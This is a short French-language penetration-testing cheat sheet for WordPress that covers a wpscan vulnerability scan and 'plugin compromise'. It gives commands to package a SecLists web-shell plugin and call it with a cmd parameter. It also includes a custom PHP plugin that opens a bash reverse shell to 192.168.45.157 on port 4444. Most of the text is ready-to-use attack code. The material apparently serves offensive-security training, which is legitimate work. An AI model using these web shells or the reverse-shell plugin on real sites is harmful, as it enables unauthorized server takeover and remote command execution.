Wordpress

Scan de vulnérabilité

wpscan --url $WP_URL --api-token $WPSCAN_TOKEN --update

Ressources :

https://github.com/wpscanteam/wpscan

Compromission de plugin

Méthode simple

Création du package à partir du plugin disponible dans seclists.

cp /usr/share/seclists/Web-Shells/WordPress/plugin-shell.php .
zip plugin-shell.zip plugin-shell.php

Une fois téléversé et activé, le webshell peut être joint de la manière suivante:

curl '$WP_URL/wp-content/plugins/plugin-shell/plugin-shell.php?cmd=whoami'

Méthode custom

<?php

/**
* Plugin Name: Reverse Shell Plugin
* Plugin URI:
* Description: Reverse Shell Plugin
* Version: 1.0
* Author: Vince Matteo
* Author URI: http://www.sevenlayers.com
*/

exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.157/4444 0>&1'");
?>

zip revshell-plugin.zip ./revshell-plugin.php